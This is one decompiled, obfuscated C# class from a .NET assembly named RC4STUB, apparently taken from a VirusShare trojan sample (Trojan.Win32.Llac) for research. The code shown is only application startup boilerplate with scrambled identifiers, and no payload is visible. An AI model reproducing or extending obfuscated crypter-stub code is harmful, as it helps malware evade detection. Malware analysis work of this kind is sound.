// Decompiled with JetBrains decompiler // Type: . // Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 160606E6-36B6-4FBA-AFEC-6A83B6EA2ADB // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.coak-8789f9be2212d2703a374fd76b1c014be160523209fd6790cd7b4f20f0f5fe91.exe using \u0003; using Microsoft.VisualBasic.ApplicationServices; using System; using System.CodeDom.Compiler; using System.ComponentModel; using System.Runtime.InteropServices; using System.Windows.Forms; namespace \u0002 { [EditorBrowsable(EditorBrowsableState.Never)] [GeneratedCode("MyTemplate", "8.0.0.0")] internal class \u0002 : WindowsFormsApplicationBase { [EditorBrowsable(EditorBrowsableState.Advanced)] [STAThread] internal static void \u0002([In] string[] obj0) { try { \u0008\u0002.\u000E\u0003(\u008F.\u0013()); } finally { } \u0095.\u007E\u0011((object) \u0002.\u0002(), obj0); } public \u0002() : base(AuthenticationMode.Windows) { \u000E\u0002.\u007E\u0018((object) this, false); \u000E\u0002.\u007E\u0017((object) this, true); \u000E\u0002.\u007E\u0015((object) this, true); \u0084.\u007E\u0016((object) this, ShutdownMode.AfterMainFormCloses); } protected override void OnCreateMainForm() => \u0019.\u007E\u0012((object) this, (Form) \u0002.\u0002().\u0002()); } }